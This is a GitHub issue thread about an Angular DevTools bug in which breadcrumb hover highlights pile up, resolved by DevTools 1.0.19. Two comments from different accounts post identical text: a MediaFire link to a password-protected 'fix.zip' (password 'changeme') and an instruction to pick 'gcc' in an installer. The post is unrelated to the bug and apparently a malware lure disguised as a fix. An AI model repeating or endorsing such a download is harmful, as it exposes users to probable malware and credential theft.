### ISSUE TITLE
Devtools highlight not getting removed for bottom breadcrumbs

### ISSUE THREAD

**Issue by sheikalthaf** [angular/angular#57557]
### Which @angular/* package(s) are the source of the bug?

Don't known / other

### Is this a regression?

Yes

### Description

In devtools, if i hover over the breadcrumbs items the highlight getting duplicated.

https://github.com/user-attachments/assets/72caa77c-7d6d-47b0-921b-e7d56fc58a53

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by anthony-b-dev** [comment]
Having a similar issue, but for me it happens when I traverse the tree structure as well. Eventually I'm all blue just like in the video.

**Comment by sheikalthaf** [comment]
@anthony-b-dev this issue has been fixed but not yet released. @AleksanderBodurri can are we going to release the devtools update.

**Comment by sheikalthaf** [comment]
@anthony-b-dev can you check with devtools version 1.0.19?

**Comment by anthony-b-dev** [comment]
@sheikalthaf looks like 1.0.19 solves the problem! 

Unfortunately 1.0.19 is not out yet on firefox... any idea when it will be released there next?

**Comment by sheikalthaf** [comment]
@dgp1130 can you comment on the release for Firefox. @anthony-b-dev   I'll close the issue for now.

**Comment by anthony-b-dev** [comment]
just updated Firefox extension as well and it works there too. Thanks!
